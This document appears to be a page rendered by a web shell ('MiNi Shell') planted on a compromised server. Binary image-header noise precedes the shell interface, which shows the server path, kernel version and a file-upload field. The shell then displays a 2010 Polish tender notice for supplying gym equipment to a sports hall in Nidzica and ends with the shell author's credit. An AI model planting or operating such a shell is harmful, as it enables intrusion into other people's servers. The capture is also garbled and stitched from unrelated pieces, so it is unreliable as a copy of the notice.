JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/368638-N-2010.html

<p class="kh_header"><b>Nidzica: Dostawa i montaż artykułów i sprzętu sportowego do  siłowni w Hali widowiskowo- sportowej w Nidzicy</b><br>
<b>Numer ogłoszenia: 368638 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Oświaty i Sportu w Nidzicy , ul. Kolejowa 5, 13-100 Nidzica, woj. warmińsko-mazurskie, tel. 89 6252457, faks 89 6252457.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż artykułów i sprzętu sportowego do  siłowni w Hali widowiskowo- sportowej w Nidzicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa i montaż artykułów i sprzętu sportowego do siłowni w Hali widowiskowo- sportowej w Nidzicy:

Zadanie  I Dostawa i montaż sprzętu  aerobowego 
Kod CPV:
37440000-4 Sprzęt do ćwiczeń fizycznych
37441100-1Bieżnie mechaniczne
37441300-4Rowery stacjonarne 
37441400-5Maszyny do wiosłowania
- Przedmiot zamówienia w zadaniu I obejmuje: dostawę i montaż bieżni treningowej, roweru spinningowego, wioślarza treningowego, maszyny eliptycznej, roweru poziomego i pionowego.
- Zamawiający wymaga aby rower spinningowy, rower pionowy, rower poziomy, wioślarz oraz maszyna eliptyczna pochodziły od jednego producenta i posiadały wspólne cechy produkcyjne.
- Zamawiający wymaga aby sprzęt aerobowy był przystosowany do eksploatacji w pomieszczeniach zamkniętych, zadaszonych, wyposażonych w wentylację. Aby był przystosowany do pracy ciągłej: bieżnia min. 5 godzin dziennie, pozostałe maszyny min. 4 godziny dziennie. Maszyny powinny być w kolorze srebrno - antracytowym o estetycznym wyglądzie. Wykonane z najwyżej jakości materiałów.

Szczegółowy zakres i opis przedmiotu zamówienia został zawarty  w:
a)	Wykazie sprzętu stanowiącym załącznik nr 2 do SIWZ.
b)	Wzorze umowy stanowiącym załącznik nr 3 do SIWZ.

lub/i

Zadanie  II Dostawa i montaż maszyn i akcesoriów do ćwiczeń  siłowych 
Kod CPV:
37442100-8 Hantle
37442200-8 Sztangi
37442400-8 Ławeczki lub stojaki z ciężarkami
37441900-0Urządzenia do treningu urozmaiconego
- Przedmiot zamówienia w zadaniu II obejmuje: dostawę i montaż maszyny do mięśni brzucha i pleców, zestawu uretanowych pierścieni na sztangę ze stojakiem, zestawu hantli sześciokątnych ze stojakiem, zestawu sztang ze stojakiem, zestawu hantli Kettlebels, zestawu drążków do urządzeń linkowych, ławki treningowej wielofunkcyjnej regulowanej, ławki treningowej- modlitewnik, ławki treningowej skośnej w górę, ławki poziomej- prostej do wyciskania.
- Zamawiający wymaga aby sztangi oraz pierścienie na sztangę pochodziły od jednego producenta i posiadały wspólne cechy produkcyjne (średnica tulei i średnica otworów w pierścieniach musi być taka sama),
- Zamawiający wymaga aby wszystkie ławki zawarte w zamówieniu pochodziły od jednego producenta oraz pochodziły z tej samej serii produktów.
- Zamawiający wymaga aby przyrządy i maszyny były lakierowane w kolorze srebrnym najwyższej klasy lakierami proszkowymi utwardzanymi w wysokiej temperaturze, trwałymi i odpornymi na uszkodzenia oraz łatwymi do ewentualnej naprawy. Powłoki lakiernicze muszą tworzyć trwałą i gładką do utrzymania w czystości powierzchnię.
- Zamawiający wymaga aby tapicerki siedzisk i oparć ławek treningowych wykonane były  ze sklejki o grubości minimum 10 mm, gąbki wykonanej na drobnym sicie o granulacji minimum 120 mm, grubości minimum20 mm. Całość powinna być wykończona trwałym materiałem sztucznym o parametrach co najmniej skaju oddychającego tzw. sztucznej skóry w kolorze brązowym. Tapicerka trwała i odporna na intensywne używanie oraz pot ćwiczących. Łatwa do samodzielnej naprawy.

Szczegółowy zakres i opis przedmiotu zamówienia został zawarty  w:
a)	Wykazie sprzętu stanowiącym załącznik nr 2 do SIWZ.
b)	Wzorze umowy stanowiącym załącznik nr 3 do SIWZ.

2. Dostarczone artykuły i sprzęt muszą być nowe fabrycznie i wolne od wad fizycznych.
3.Dostarczone artykuły i sprzęt muszą być wytworzone z zachowaniem polskich norm przenoszących normy europejskie i posiadać właściwości, cechy niezbędne do użytkowania i ich eksploatacji. Na żądanie Zamawiającego Wykonawca zobowiązuje się  przedłożyć na wskazane materiały certyfikat na znak bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z zasadniczymi wymaganiami dotyczącymi danego wyrobu.
4. W przypadku, gdy w opisie zamówienia, w jakiejkolwiek części dokumentacji lub innej części SIWZ, zostały wskazane znaki towarowe, patenty lub pochodzenie materiałów, urządzeń, bądź przedmiot zamówienia został opisany za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych opisywanym, z zastrzeżeniem, że gwarantują one realizację zamówienia zgodnie z opisem przedmiotu zamówienia i zapewniają uzyskanie parametrów technicznych i funkcjonalno-użytkowych nie gorszych od założonych a także zgodne z wymogami określonymi w Polskich Normach przenoszących normy europejskie lub normach innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy. W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy, uwzględnia się w kolejności : 
-europejskie aprobaty techniczne,
-wspólne specyfikacje techniczne,
-normy międzynarodowe,
- inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów, o których mowa powyżej, uwzględnia się w kolejności :
-Polskie Normy,
-polskie aprobaty techniczne,
- polskie specyfikacje techniczne.
5.1. Na dostarczony sprzęt, Wykonawca musi udzielić gwarancji zgodnej z okresem wskazanym poniżej.  Termin gwarancji będzie liczony od daty bezusterkowego odbioru zamontowanej dostawy.
5.2.W ramach gwarancji wykonawca musi zapewnić:
- bezpłatną obsługę serwisową na dostarczony sprzęt, 
- czas reakcji serwisu na zgłoszone usterki - nie dłużej niż 48 godzin.
5.3. Zamawiający wymaga min. 1 roku gwarancji komercyjnej na rower spinningowy, rower pionowy, rower poziomy, wioślarz oraz maszynę eliptyczną.
5.4.Zamawiajacy wymaga min. 2 lat pełnej komercyjnej gwarancji na bieżnię treningową oraz min. 15 lat na jej silnik.
5.5. Zamawiający wymaga min. 10 lat gwarancji na konstrukcje stalowe w urządzeniach siłowych.
5.6. Zamawiający wymaga min. 2 lat komercyjnej gwarancji na sztangi oraz min. 5 lat komercyjnej gwarancji na pierścienie do sztang.
5.7. Zamawiający wymaga min. 5 lat komercyjnej gwarancji na hantle.
5.8.Zamawiajacy wymaga gwarancji komercyjnej na maszynę do mięśni brzucha i pleców: min. 4 lata na stos, min. 2 lata na linki, pasy, łożyska, min. 1 rok na uchwyty i plastik.
6. Wykonawca dostarczy gwarancje, instrukcje oraz wszystkie inne dokumenty dotyczące przedmiotu zamówienia sporządzone w języku polskim wraz z dostawą artykułów i sprzętu sportowego.
7. Podstawą przekazania przedmiotu zamówienia będzie podpisanie przez strony protokołu zdawczo-odbiorczego.
8. Główne miejsce realizacji zamówienia: województwo Warmińsko- Mazurskie, Gmina Nidzica, miejscowość Nidzica, ul. Polna, Hala widowisko- sportowa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2, 37.44.00.00-4, 37.44.11.00-1, 37.44.13.00-5, 37.44.21.00-8, 37.44.22.00-8, 37.44.24.00-8, 37.44.19.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie przewiduje wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona ustalenia czy Wykonawca spełnia warunki udziału w postępowaniu, jeżeli Wykonawca wykaże, że:
W zakresie wskazanego warunku Wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dostawę polegającą na: 
a) ubiegając się o 1 część  zamówienia-  dostawie  sprzętu aerobowego o wartości nie mniejszej niż 40.000 zł.,
b) ubiegając się o 2 część zamówienia- dostawie maszyn i akcesoriów do ćwiczeń siłowych o wartości nie mniejszej niż 40.000 zł.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określa następujące warunki, w jakich przewiduje możliwość wprowadzenia zmian w umowie: 
1)zmianę terminu wykonania przedmiotu umowy w przypadku zaistnienia działań siły wyższej,
2) zmianę danych teleadresowych,
3) zmiany podwykonawców oraz zakresu podwykonawstwa w przypadku gdy Wykonawca wykonuje umowę przy pomocy podwykonawców. 
Korekta terminu zostanie przedłożona każdorazowo Zamawiającemu w terminie dwóch dni kalendarzowych po powzięciu wiadomości o konieczności wprowadzenia zmian w umowie w formie aneksu do umowy. Okres przesunięcia terminu zakończenia zamówienia będzie równy okresowi  koniecznemu na wykonanie dostawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://nidzica-zooksit.bip-wm.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Oświaty i Sportu, 
ul. Kolejowa 5, 
13-100 Nidzica 
SIWZ można również usykaĆ drogą mailową lub faxem..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2010 godzina 09:30, miejsce: Zespół Obsługi Oświaty i Sportu, 
ul. Kolejowa 5, 
13-100 Nidzica (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż sprzętu  aerobowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  I Dostawa i montaż sprzętu  aerobowego 
- Przedmiot zamówienia w zadaniu I obejmuje: dostawę i montaż bieżni treningowej, roweru spinningowego, wioślarza treningowego, maszyny eliptycznej, roweru poziomego i pionowego.
- Zamawiający wymaga aby rower spinningowy, rower pionowy, rower poziomy, wioślarz oraz maszyna eliptyczna pochodziły od jednego producenta i posiadały wspólne cechy produkcyjne.
- Zamawiający wymaga aby sprzęt aerobowy był przystosowany do eksploatacji w pomieszczeniach zamkniętych, zadaszonych, wyposażonych w wentylację. Aby był przystosowany do pracy ciągłej: bieżnia min. 5 godzin dziennie, pozostałe maszyny min. 4 godziny dziennie. Maszyny powinny być w kolorze srebrno - antracytowym o estetycznym wyglądzie. Wykonane z najwyżej jakości materiałów.

Szczegółowy zakres i opis przedmiotu zamówienia został zawarty  w:
a)	Wykazie sprzętu stanowiącym załącznik nr 2 do SIWZ.
b)	Wzorze umowy stanowiącym załącznik nr 3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2, 37.44.00.00-4, 37.44.11.00-1, 37.44.13.00-4, 37.44.14.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż maszyn i akcesoriów do ćwiczeń  siłowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  II Dostawa i montaż maszyn i akcesoriów do ćwiczeń  siłowych 

- Przedmiot zamówienia w zadaniu II obejmuje: dostawę i montaż maszyny do mięśni brzucha i pleców, zestawu uretanowych pierścieni na sztangę ze stojakiem, zestawu hantli sześciokątnych ze stojakiem, zestawu sztang ze stojakiem, zestawu hantli Kettlebels, zestawu drążków do urządzeń linkowych, ławki treningowej wielofunkcyjnej regulowanej, ławki treningowej- modlitewnik, ławki treningowej skośnej w górę, ławki poziomej- prostej do wyciskania.
- Zamawiający wymaga aby sztangi oraz pierścienie na sztangę pochodziły od jednego producenta i posiadały wspólne cechy produkcyjne (średnica tulei i średnica otworów w pierścieniach musi być taka sama),
- Zamawiający wymaga aby wszystkie ławki zawarte w zamówieniu pochodziły od jednego producenta oraz pochodziły z tej samej serii produktów.
- Zamawiający wymaga aby przyrządy i maszyny były lakierowane w kolorze srebrnym najwyższej klasy lakierami proszkowymi utwardzanymi w wysokiej temperaturze, trwałymi i odpornymi na uszkodzenia oraz łatwymi do ewentualnej naprawy. Powłoki lakiernicze muszą tworzyć trwałą i gładką do utrzymania w czystości powierzchnię.
- Zamawiający wymaga aby tapicerki siedzisk i oparć ławek treningowych wykonane były  ze sklejki o grubości minimum 10 mm, gąbki wykonanej na drobnym sicie o granulacji minimum 120 mm, grubości minimum20 mm. Całość powinna być wykończona trwałym materiałem sztucznym o parametrach co najmniej skaju oddychającego tzw. sztucznej skóry w kolorze brązowym. Tapicerka trwała i odporna na intensywne używanie oraz pot ćwiczących. Łatwa do samodzielnej naprawy.

Szczegółowy zakres i opis przedmiotu zamówienia został zawarty  w:
a)	Wykazie sprzętu stanowiącym załącznik nr 2 do SIWZ.
b)	Wzorze umowy stanowiącym załącznik nr 3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2, 37.44.21.00-8, 37.44.22.00-8, 37.44.24.00-8, 37.44.19.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com